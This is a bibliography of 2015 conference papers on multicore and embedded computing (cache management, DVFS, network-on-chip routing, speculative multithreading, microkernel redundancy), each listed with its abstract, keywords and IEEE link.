Songyuan Li; Jinglei Meng; Licheng Yu; Jianliang Ma; Tianzhou Chen; Minghui Wu, "Buffer Filter: A Last-Level Cache Management Policy for CPU-GPGPU Heterogeneous System," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 266-271, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.290

Abstract: There is a growing trend towards heterogeneous systems, which contain CPUs and GPGPUs in a single chip. Managing those various on-chip resources shared between CPUs and GPGPUs, however, is a big issue and the last-level cache (LLC) is one of the most critical resources due to its impact on system performance. Some well-known cache replacement policies like LRU and DRRIP, designed for a CPU, can not be so well qualified for heterogeneous systems because the LLC will be dominated by memory accesses from thousands of threads of GPGPU applications and this may lead to significant performance downgrade for a CPU. Another reason is that a GPGPU is able to tolerate memory latency when quantity of active threads in the GPGPU is sufficient, but those policies do not utilize this feature. In this paper we propose a novel shared LLC management policy for CPU-GPGPU heterogeneous systems called Buffer Filter which takes advantage of memory latency tolerance of GPGPUs. This policy has the ability to restrict streaming requests of GPGPU by adding a buffer to memory system and vacate LLC space for cache-sensitive CPU applications. Although there is some IPC loss for GPGPU but the memory latency tolerance ensures the basic performance of GPGPU's applications. The experiments show that the Buffer Filter is able to filtrate up to 50% to 75% of the total GPGPU streaming requests at the cost of little GPGPU IPC decrease and improve the hit rate of CPU applications by 2x to 7x.

Keywords: cache storage; graphics processing units; CPU-GPGPU heterogeneous system; buffer filter; cache replacement policies; cache-sensitive CPU applications; general-purpose graphics processing unit; last-level cache management policy; memory access; memory latency tolerance; on-chip resources; shared LLC management policy; Benchmark testing; Central Processing Unit; Instruction sets; Memory management; Multicore processing; Parallel processing; System performance; heterogeneous system; multicore; shared last-level cache (ID#: 16-9391)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336174&isnumber=7336120

 

Muhammad Mahbub ul Islam, F.; Man Lin, "A Framework for Learning Based DVFS Technique Selection and Frequency Scaling for Multi-core Real-Time Systems," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 721-726, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.313

Abstract: Multi-core processors have become very popular in recent years due to the higher throughput and lower energy consumption compared with unicore processors. They are widely used in portable devices and real-time systems. Despite of enormous prospective, limited battery capacity restricts their potential and hence, improving the system level energy management is still a major research area. In order to reduce the energy consumption, dynamic voltage and frequency scaling (DVFS) has been commonly used in modern processors. Previously, we have used reinforcement learning to scale voltage and frequency based on the task execution characteristics. We have also designed learning based method to choose a suitable DVFS technique to execute at different states. In this paper, we propose a generalized framework which integrates these two approaches for real-time systems on multi-core processors. The framework is generalized in a sense that it can work with different scheduling policies and existing DVFS techniques.

Keywords: learning (artificial intelligence); multiprocessing systems; power aware computing; real-time systems; dynamic voltage and frequency scaling; learning-based DVFS technique selection; multicore processor; multicore real-time system; reinforcement learning-based method; system level energy management; unicore processor; Energy consumption; Heuristic algorithms; Multicore processing; Power demand; Program processors; Real-time systems; Vehicle dynamics; Dynamic voltage and frequency scaling; Energy efficiency; Machine learning; Multi-core processors; time systems (ID#: 16-9392)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336243&isnumber=7336120

 

Ying Li; Jianwei Niu; Meikang Qiu; Xiang Long, "Optimizing Tasks Assignment on Heterogeneous Multi-core Real-Time Systems with Minimum Energy," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 577-582, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.126

Abstract: The main challenge for embedded real-time systems, especially for mobile devices, is the trade-off between system performance and energy efficiency. Through studying the relationship between energy consumption, execution time and completion probability of tasks on heterogeneous multi-core architectures, we propose an Accelerated Search algorithm based on dynamic programming to obtain a combination of various task schemes which can be completed in a given time with a confidence probability by consuming the minimum possible energy. We adopt a DAG (Directed Acyclic Graph) to represent the precedent relation between tasks and develop a Minimum-Energy Model to find the optimal tasks assignment. The heterogeneous multi-core architectures can execute tasks under different voltage level with DVFS which leads to different execution time and different consumption energy. The experimental results demonstrate our approach outperforms state-of-the-art algorithms in this field (maximum improvement of 24.6%).

Keywords: directed graphs; dynamic programming; embedded systems; energy conservation; energy consumption; mobile computing; multiprocessing systems; power aware computing; probability; search problems; DAG; DVFS; accelerated search algorithm; confidence probability; directed acyclic graph; dynamic programming; embedded real-time systems; energy consumption; energy efficiency; execution time; heterogeneous multicore real-time systems; minimum energy model; mobile devices; precedent relation; system performance; task assignment optimization; task completion probability; voltage level; Algorithm design and analysis; Dynamic programming; Energy consumption; Heuristic algorithms; Multicore processing; Real-time systems; Time factors; heterogeneous multi-core real-time system; minimum energy; probability statistics; tasks assignment (ID#: 16-9393)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336220&isnumber=7336120

 

Aguilar, M.A.; Eusse, J.F.; Leupers, R.; Ascheid, G.; Odendahl, M., "Extraction of Kahn Process Networks from While Loops in Embedded Software," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1078-1085, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.158

Abstract: Many embedded applications such as multimedia, signal processing and wireless communications present a streaming processing behavior. In order to take full advantage of modern multi-and many-core embedded platforms, these applications have to be parallelized by describing them in a given parallel Model of Computation (MoC). One of the most prominent MoCs is Kahn Process Network (KPN) as it allows to express multiple forms of parallelism and it is suitable for efficient mapping and scheduling onto parallel embedded platforms. However, describing streaming applications manually in a KPN is a challenging task. Especially, since they spend most of their execution time in loops with unbounded number of iterations. These loops are in several cases implemented as while loops, which are difficult to analyze. In this paper, we present an approach to guide the derivation of KPNs from embedded streaming applications dominated by multiple types of while loops. We evaluate the applicability of our approach on an eight DSP core commercial embedded platform using realistic benchmarks. Results measured on the platform showed that we are able to speedup sequential benchmarks on average by a factor up to 4.3x and in the best case up to 7.7x. Additionally, to evaluate the effectiveness of our approach, we compared it against a state-of-the-art parallelization framework.

Keywords: digital signal processing chips; embedded systems; parallel processing; program control structures; DSP core embedded platform; KPN; Kahn process network extraction; MoC; embedded software; embedded streaming applications; execution time; many-core embedded platforms; multicore embedded platforms; parallel embedded platforms; parallel model-of-computation; parallelized applications; sequential benchmarks; while loops; Computational modeling; Data mining; Long Term Evolution; Parallel processing; Runtime; Switches; Uplink; DSP; Kahn Process Networks; MPSoCs; Parallelization; While Loops (ID#: 16-9394)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336312&isnumber=7336120

 

Rushaidat, K.; Schwiebert, L.; Jackman, B.; Mick, J.; Potoff, J., "Evaluation of Hybrid Parallel Cell List Algorithms for Monte Carlo Simulation," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1859-1864, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.260

Abstract: This paper describes efficient, scalable parallel implementations of the conventional cell list method and a modified cell list method to calculate the total system intermolecular Lennard-Jones force interactions in the Monte Carlo Gibbs ensemble. We targeted this part of the Gibbs ensemble for optimization because it is the most computationally demanding part of the force interactions in the simulation, as it involves all the molecules in the system. The modified cell list implementation reduces the number of particles that are outside the interaction range by making the cells smaller, thus reducing the number of unnecessary distance evaluations. Evaluation of the two cell list methods is done using a hybrid MPI+OpenMP approach and a hybrid MPI+CUDA approach. The cell list methods are evaluated on a small cluster of multicore CPUs, Intel Phi coprocessors, and GPUs. The performance results are evaluated using different combinations of MPI processes, threads, and problem sizes.

Keywords: Monte Carlo methods; application program interfaces; cellular biophysics; graphics processing units; intermolecular forces; materials science computing; message passing; multi-threading; parallel architectures; GPU; Intel Phi coprocessors; Monte Carlo Gibbs ensemble; Monte Carlo simulation; conventional-cell list method; distance evaluations; force interactions; hybrid MPI-plus-CUDA approach; hybrid MPI-plus-OpenMP approach; hybrid parallel cell list algorithm evaluation; modified cell list implementation; multicore CPU; performance evaluation; scalable-parallel implementations; total system intermolecular Lennard-Jones force interactions; Computational modeling; Force; Graphics processing units; Microcell networks; Monte Carlo methods; Solid modeling; Cell List; Gibbs Ensemble; Hybrid Parallel Architectures; Monte Carlo Simulations (ID#: 16-9395)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336443&isnumber=7336120

 

Peng Sun; Chandrasekaran, S.; Suyang Zhu; Chapman, B., "Deploying OpenMP Task Parallelism on Multicore Embedded Systems with MCA Task APIs," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 843-847, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.88

Abstract: Heterogeneous multicore embedded systems are rapidly growing with cores of varying types and capacity. Programming these devices and exploiting the hardware has been a real challenge. The programming models and its execution are typically meant for general purpose computation, they are mostly too heavy to be adopted for the resource-constrained embedded systems. Embedded programmers are still expected to use low-level and proprietary APIs, making the software built less and less portable. These challenges motivated us to explore how OpenMP, a high-level directive-based model, could be used for embedded platforms. In this paper, we translate OpenMP to Multicore Association Task Management API (MTAPI), which is a standard API for leveraging task parallelism on embedded platforms. Our results demonstrate that the performance of our OpenMP runtime library is comparable to the state-of-the-art task parallel solutions. We believe this approach will provide a portable solution since it abstracts the low-level details of the hardware and no longer depends on vendor-specific API.

Keywords: application program interfaces; embedded systems; multiprocessing systems; parallel processing; MCA; MTAPI; OpenMP runtime library; OpenMP task parallelism; heterogeneous multicore embedded system; high-level directive-based model; multicore association task management API; multicore embedded system; resource-constrained embedded system; vendor-specific API; Computational modeling; Embedded systems; Hardware; Multicore processing; Parallel processing; Programming; Heterogeneous Multicore Embedded Systems; MTAPI; OpenMP; Parallel Computing (ID#: 16-9396)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336267&isnumber=7336120

 

Xu, T.C.; Leppanen, V.; Liljeberg, P.; Plosila, J.; Tenhunen, H., "Trio: A Triple Class On-chip Network Design for Efficient Multicore Processors," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 951-956, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.44

Abstract: We propose and analyse an on-chip interconnect design for improving the efficiency of multicore processors. Conventional interconnection networks are usually based on a single homogeneous network with uniform processing of all traffic. While the design is simplified, this approach can have performance bottlenecks and limitations on system efficiency. We investigate the traffic pattern of several real world applications. Based on a directory cache coherence protocol, we characterise and categorize the traffic in terms of various aspects. It is discovered that control and unicast packets dominated the network, while the percentages of data and multicast messages are relatively low. Furthermore, we find most of the invalidation messages are multicast messages, and most of the multicast messages are invalidation message. The multicast invalidation messages usually have higher number of destination nodes compared with other multicast messages. These observations lead to the proposed triple class interconnect, where a dedicated multicast-capable network is responsible for the control messages and the data messages are handled by another network. By using a detailed full system simulation environment, the proposed design is compared with the homogeneous baseline network, as well as two other network designs. Experimental results show that the average network latency and energy delay product of the proposed design have improved 24.4% and 10.2% compared with the baseline network.

Keywords: cache storage; multiprocessing systems; multiprocessor interconnection networks; network synthesis; network-on-chip; Trio; average network latency; dedicated multicast-capable network; destination nodes; directory cache coherence protocol; energy delay product; full system simulation environment; homogeneous baseline network; multicast invalidation messages; multicore processors; on-chip interconnect design; traffic pattern; triple class on-chip network design; unicast packets; Coherence; Multicore processing; Ports (Computers); Program processors; Protocols; System-on-chip; Unicast; cache; design; efficient; multicore; network-on-chip (ID#: 16-9397)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336293&isnumber=7336120

 

Rao, N.S.V.; Towsley, D.; Vardoyan, G.; Settlemyer, B.W.; Foster, I.T.; Kettimuthu, R., "Sustained Wide-Area TCP Memory Transfers over Dedicated Connections," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1603-1606, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.86

Abstract: Wide-area memory transfers between on-going computations and remote steering, analysis and visualization sites can be utilized in several High-Performance Computing (HPC) scenarios. Dedicated network connections with high capacity, low loss rates and low competing traffic, are typically provisioned over current HPC infrastructures to support such transfers. To gain insights into such transfers, we collected throughput measurements for different versions of TCP between dedicated multi-core servers over emulated 10 Gbps connections with round trip times (rtt) in the range 0-366 ms. Existing TCP models and measurements over shared links are well-known to exhibit monotonically decreasing, convex throughput profiles as rtt is increased. In sharp contrast, our these measurements show two distinct regimes: a concave profile at lower rtts and a convex profile at higher rtts. We present analytical results that explain these regimes: (a) at lower rtt, rapid throughput increase due to slow-start leads to the concave profile, and (b) at higher rtt, TCP congestion avoidance phase with slower dynamics dominates. In both cases, however, we analytically show that throughput decreases with rtt, albeit at different rates, as confirmed by the measurements. These results provide practical TCP solutions to these transfers without requiring additional hardware and software, unlike Infiniband and UDP solutions, respectively.

Keywords: network servers; parallel processing; sustainable development; telecommunication congestion control; telecommunication links; telecommunication traffic; transport protocols; wide area networks; HPC; concave profile; congestion avoidance; convex profile; dedicated connection; high-performance computing; multicore server; remote steering; shared link; sustained wide area TCP memory transfer; visualization site; Current measurement; Data transfer; Hardware; Linux; Software; Supercomputers; Throughput; TCP; dedicated connections; memory transfers; throughput measurements (ID#: 16-9398)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336397&isnumber=7336120

 

Shekhar, M.; Ramaprasad, H.; Mueller, F., "Evaluation of Memory Access Arbitration Algorithm on Tilera's TILEPro64 Platform," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1154-1159, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.245

Abstract: As real-time embedded systems demand more and more computing power under reasonable energy budgets, multi-core platforms are a viable option. However, deploying real-time applications on multi-core platforms introduce several predictability challenges. One of these challenges is bounding the latency of memory accesses issued by real-time tasks. This challenge is exacerbated as the number of cores and, hence, the degree of resource sharing increases. Over the last several years, researchers have proposed techniques to overcome this challenge. In prior work, we proposed an arbitration policy for memory access requests over a Network-on-Chip. In this paper, we implement and evaluate variants of our arbitration policy on a real hardware platform, namely Tilera's TilePro64 platform.

Keywords: embedded systems; multiprocessing systems; network-on-chip; storage management;TILEPro64 platform; memory access arbitration algorithm; multicore platforms; network-on-chip; real-time embedded systems; Dynamic scheduling; Engines; Hardware; Instruction sets; Memory management; Real-time systems; System-on-chip (ID#: 16-9399)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336325&isnumber=7336120

 

Gunes, V.; Givargis, T., "XGRID: A Scalable Many-Core Embedded Processor," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1143-1146, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.99

Abstract: The demand for compute cycles needed by embedded systems is rapidly increasing. In this paper, we introduce the XGRID embedded many-core system-on-chip architecture. XGRID makes use of a novel, FPGA-like, programmable interconnect infrastructure, offering scalability and deterministic communication using hardware supported message passing among cores. Our experiments with XGRID are very encouraging. A number of parallel benchmarks are evaluated on the XGRID processor using the application mapping technique described in this work. We have validated our scalability claim by running our benchmarks on XGRID varying in core count. We have also validated our assertions on XGRID architecture by comparing XGRID against the Graphite many-core architecture and have shown that XGRID outperforms Graphite in performance.

Keywords: embedded systems; field programmable gate arrays; multiprocessing systems; parallel architectures; system-on-chip; FPGA-like, programmable interconnect infrastructure; XGRID embedded many-core system-on-chip architecture; application mapping technique; compute cycles; core count; deterministic communication; hardware supported message passing; parallel benchmarks; scalable many-core embedded processor; Benchmark testing; Communication channels; Discrete cosine transforms; Field programmable gate arrays; Multicore processing; Switches; Embedded Processors; Many-core; Multi-core; System-on-Chip Architectures (ID#: 16-9400)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336323&isnumber=7336120

 

Jia Tian; Wei Hu; Chunqiang Li; Tianpei Li; Wenjun Luo, "Multi-thread Connection Based Scheduling Algorithm for Network on Chip," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on,  pp. 1473-1478, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.160

Abstract: More and more cores are integrated onto a single chip to improve the performance and reduce the power consumption of CPU without the increased frequency. The core are connected by lines and organized as a network, which is called network on chip (NOC) as the promising paradigm. NOC has improved the performance of the CPU without the increased power consumption. However, there is still a new problem that how to schedule the threads to the different cores to take full advantages of NOC. In this paper, we proposed a new multi-thread scheduling algorithm based on thread connection for NOC. The connection relationship of the threads will be analyzed and divided into different thread sets. And at the same time, the network topology of the NOC is also analyzed. The connection relationship of the cores is set in the NOC model and divided into different regions. The thread sets and core regions will be establish correspondence relationship according to the features of them. And the multi-thread scheduling algorithm will map thread sets to the corresponding core regions. In the same core set, the threads in the same set will be scheduled via different proper approaches. The experiments have showed that the proposed algorithm can improve the performance of the programs and enhance the utilization of NOC cores.

Keywords: multi-threading; network theory (graphs); network-on-chip; performance evaluation; power aware computing; processor scheduling; CPU; NOC core; multithread connection based scheduling; multithread connection-based scheduling algorithm; network topology; network-on-chip; power consumption; Algorithm design and analysis; Heuristic algorithms; Instruction sets; Multicore processing; Network topology; Scheduling algorithms; System-on-chip; Algorithm; Network on Chip; Scheduling; Thread Connection (ID#: 16-9401)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336376&isnumber=7336120

 

Yuxiang Li; Yinliang Zhao; Huan Gao, "Using Artificial Neural Network for Predicting Thread Partitioning in Speculative Multithreading," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 823-826, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.28

Abstract: Speculative multithreading (SpMT) is a thread-level automatic parallelization technique to accelerate sequential programs on multi-core, and it partitions programs into multiple threads to be speculatively executed in the presence of ambiguous data and control dependences while the correctness of the programs is guaranteed by hardware support. Thread granularity, number of parallel threads as well as partition postions are crucial to the performance improvement in SpMT, for they determine the amount of resources (CPU, memory, cache, or waiting cycles, etc), and affect the efficiency of every PE (Processing Element). In conventional way, these three parameters are determined by heuristic rules. Although it is simple to partition threads with them, they are a type of one-size-fits-all strategy and can not guarantee to get the optimal solution of thread partitioning. This paper proposes an Artificial Neural Network (ANN) based approach to learn and determine the thread partition strategy. Using the ANN-based thread partition approach, an unseen irregular program can obtain a stable, much higher speedup than the Heuristic Rules (HR) based approach. On Prophet, which is a generic SpMT processor to evaluate the performance of multithreaded programs, the novel thread partitioning policy is evaluated and reaches an average speedup of 1.80 on 4-core processor. Experiments show that our proposed approach can obtain a significant increase in speedup and Olden benchmarks deliver a better performance improvement of 2.36% than the traditional heuristic rules based approach. The results indicate that our approach finds the best partitioning scheme for each program and is more stable across programs.

Keywords: multi-threading; multiprocessing systems; neural nets; ANN-based thread partition approach; HR based approach; Olden benchmark; PE; Prophet; SpMT processor; artificial neural network; heuristic rules; multicore; multithreaded programs; one-size-fits-all strategy; parallel threads; partition position; processing element; sequential programs; speculative multithreading; thread granularity; thread partitioning policy; thread partitioning prediction; thread-level automatic parallelization technique; Cascading style sheets; Conferences; Cyberspace; Embedded software; High performance computing; Safety; ecurity; Machine learning; Prophet; speculative multithreading; thread partitioning (ID#: 16-9402)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336262&isnumber=7336120

 

Yanyan Shen; Elphinstone, K., "Microkernel Mechanisms for Improving the Trustworthiness of Commodity Hardware," in Dependable Computing Conference (EDCC), 2015 Eleventh European, pp. 155-166, 7-11 Sept. 2015. doi: 10.1109/EDCC.2015.16

Abstract: Trustworthy isolation is required to consolidate safety and security critical software systems on a single hardware platform. Recent advances in formally verifying correctness and isolation properties of a microkernel should enable mutually distrusting software to co-exist on the same platform with a high level of assurance of correct operation. However, commodity hardware is susceptible to transient faults triggered by cosmic rays, and alpha particle strikes, and thus may invalidate the isolation guarantees, or trigger failure in isolated applications. To increase trustworthiness of commodity hardware, we apply redundant execution techniques from the dependability community to a modern microkernel. We leverage the hardware redundancy provided by multicore processors to perform transient fault detection for applications and for the microkernel itself. This paper presents the mechanisms and framework for microkernel based systems to implement redundant execution for improved trustworthiness. It evaluates the performance of the resulting system on x86-64 and ARM platforms.

Keywords: multiprocessing systems; operating system kernels; redundancy; safety-critical software; security of data;64 platforms; ARM platforms; alpha particle strikes; commodity hardware trustworthiness; correctness formal verification; cosmic rays; dependability community; hardware redundancy; isolation properties; microkernel mechanisms; modern microkernel; multicore processors; redundant execution techniques; safety critical software systems; security critical software systems; transient fault detection; trustworthy isolation;x86 platforms; Hardware; Kernel; Multicore processing; Program processors; Security; Transient analysis; Microkernel; Reliability; SEUs; Security; Trustworthy Systems (ID#: 16-9403)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7371963&isnumber=7371940

 

Grammatikakis, M.D.; Petrakis, P.; Papagrigoriou, A.; Kornaros, G.; Coppola, M., "High-Level Security Services Based On A Hardware NoC Firewall Module," in Intelligent Solutions in Embedded Systems (WISES), 2015 12th International Workshop on, pp.73-78, 29-30 Oct. 2015. Doi:  (not provided)

Abstract: Security services are typically based on deploying different types of modules, e.g. firewall, intrusion detection or prevention systems, or cryptographic function accelerators. In this study, we focus on extending the functionality of a hardware Network-on-Chip (NoC) Firewall on the Zynq 7020 FPGA of a Zedboard. The NoC Firewall checks the physical address and rejects untrusted CPU requests to on-chip memory, thus protecting legitimate processes running in a multicore SoC from the injection of malicious instructions or data to shared memory. Based on a validated kernel-space Linux system driver of the NoC Firewall which is seen as a reconfigurable, memory-mapped device on top of AMBA AXI4 interconnect fabric, we develop higher-layer security services that focus on physical address protection based on a set of rules. While our primary scenario concentrates on monitors and actors related to protection from malicious (or corrupt) drivers, other interesting use cases related to healthcare ethics, are also put into the context.

Keywords: field programmable gate arrays; firewalls; multiprocessing systems; network-on-chip; AMBA AXI4 interconnect fabric; Zedboard; Zynq 7020 FPGA; corrupt drivers; hardware NoC firewall module; healthcare ethics; high-level security services; malicious drivers; malicious instructions; multicore SoC; network-on-chip; on-chip memory; physical address protection; reconfigurable memory-mapped device; shared memory; untrusted CPU requests; validated kernel-space Linux system driver; Field programmable gate arrays; Firewalls (computing); Hardware; Linux; Network interfaces; Registers; Linux driver; NoC; firewall; multicore SoC (ID#: 16-9404)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7356985&isnumber=7356973

 

Tuncali, C.E.; Fainekos, G.; Yann-Hang Lee, "Automatic Parallelization of Simulink Models for Multi-core Architectures," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on,  pp. 964-971, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.232

Abstract: This paper addresses the problem of parallelizing existing single-rate Simulink models for embedded control applications on multi-core architectures considering communication cost between blocks on different CPU cores. Utilizing the block diagram of the Simulink model, we derive the dependency graph between the different blocks. In order to solve the scheduling problem, we describe a Mixed Integer Linear Programming (MILP) formulation for optimally mapping the Simulink blocks to different CPU cores. Since the number of variables and constraints for MILP solver grows exponentially when model size increases, solving this problem in a reasonable time becomes harder. For addressing this issue, we introduce a set of techniques for reducing the number of constraints in the MILP formulation. By using the proposed techniques, the MILP solver finds solutions that are closer to the optimal solution within a given time bound. We study the scalability and efficiency of our consisting approach with synthetic benchmarks of randomly generated directed acyclic graphs. We also use the "Fault-Tolerant Fuel Control System" demo from Simulink and a Diesel engine controller from Toyota as case studies for demonstrating applicability of our approach to real world problems.

Keywords: control engineering computing; diesel engines; directed graphs; embedded systems; fault tolerant control; fuel systems; integer programming; linear programming; parallel architectures; processor scheduling; CPU cores; MILP formulation; MILP solver constraints; MILP solver variables; Simulink model parallelization problem; Toyota; block diagram; communication cost; dependency graph; diesel engine controller; embedded control applications; fault-tolerant fuel control system; mixed integer linear programming formulation; multicore architecture; randomly generated directed acyclic graphs; scheduling problem; synthetic benchmarks; Bismuth; Computational modeling; Job shop scheduling; Multicore processing; Optimization; Software packages; Multiprocessing; Simulink; embedded systems; model based development; optimization; task allocation (ID#: 16-9405)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336295&isnumber=7336120

 

Ye, J.; Songyuan Li; Tianzhou Chen, "Shared Write Buffer to Support Data Sharing Among Speculative Multi-threading Cores," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 835-838, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.287

Abstract: Speculative Multi-threading (SpMT), a.k.a Thread Level Speculation (TLS), is a most noticeable research direction of automatic extraction of thread level parallelism (TLP), which is growing appealing in the multi-core and many-core era. The SpMT threads are extracted from a single thread, and are tightly coupled with data dependences. Traditional private L1 caches with coherence mechanism will not suit such intense data sharing among SpMT threads. We propose a Shared Write Buffer (SWB) that resides in parallel with the private L1 caches, but with much smaller capacity, and short access delay. When a core writes a datum to L1 cache, it will write the SWB first, and when it reads a datum, it will read from the SWB as well as from the L1. Because the SWB is shared among the cores, it may probably return a datum quicker than the L1 if the latter needs to go through a coherence process to load the datum. This way the SWB improves the performance of SpMT inter-core data sharing, and mitigate the overhead of coherence.

Keywords: cache storage; multi-threading; multiprocessing systems; SWB; SpMT intercore data sharing; SpMT thread extraction; TLS; access delay; automatic TLP extraction; coherence overhead mitigation; data dependences; data sharing; datum; performance improvement; private L1 caches; shared write buffer; speculative multithreading cores; thread level parallelism; thread level speculation; Coherence; Delays; Instruction sets; Message systems; Multicore processing; Protocols; Cache; Multi-Core; Shared Write Buffer; SpMT; Speculative Multi-Threading (ID#: 16-9406)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336265&isnumber=7336120

 

Chunqiang Li; Wei Hu; Puzhang Wang; Mengke Song; Xinwei Cao, "A Novel Critical Path Based Routing Method Based on for NOC," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1546-1551, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.159

Abstract: When more and more cores are integrated onto a single chip and connected by lines, network on chip (NOC) has provided a new on chip structure. The tasks are mapped to the cores on the chip. They have communication requirements according to their relationship. When the communication data are transmitted on the network, they need to be given a suitable path to the target cores with low latency. In this paper, we proposed a new routing method based on static critical path for NOC. The tasks with multi-threads will be analyzed first and the running paths of the tasks will be marked. The static critical path can be found according to the length of the running paths. The messages on critical path will be marked as critical messages. When the messages have arrived at the routers on chip, the critical messages will be forwarded firstly in terms of their importance. This new routing method has been tested on simulation environment. The experiment results proved that this method can accelerate the transmission speed of critical messages and improve the performance of the tasks.

Keywords: network routing; network-on-chip; NOC; chip structure; communication data transmission; communication requirements; critical messages; critical path; critical path based routing method; latency; multithreads; network on chip; running path length; simulation environment; static critical path; target cores; task mapping; task performance improvement; Algorithm design and analysis; Message systems; Multicore processing; Program processors; Quality of service; Routing; System-on-chip; Critical Path; Network on Chip; Routing Method (ID#: 16-9407)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336388&isnumber=7336120

 

Raab, M., "Global and Thread-Local Activation of Contextual Program Execution Environments," in Object/Component/Service-Oriented Real-Time Distributed Computing Workshops (ISORCW), 2015 IEEE International Symposium on, pp. 34-41, 13-17 April 2015. doi: 10.1109/ISORCW.2015.52

Abstract: Ubiquitous computing often demands applications to be both customizable and context-aware: Users expect smart devices to adapt to the context and respect their preferences. Currently, these features are not well-supported in a multi-core embedded setup. The aim of this paper is to describe a tool that supports both thread-local and global context-awareness. The tool is based on code generation using a simple specification language and a library that persists the customizations. In a case study and benchmark we evaluate a web server application on embedded hardware. Our web server application uses contexts to represent user sessions, language settings, and sensor states. The results show that the tool has minimal overhead, is well-suited for ubiquitous computing, and takes full advantage of multi-core processors.

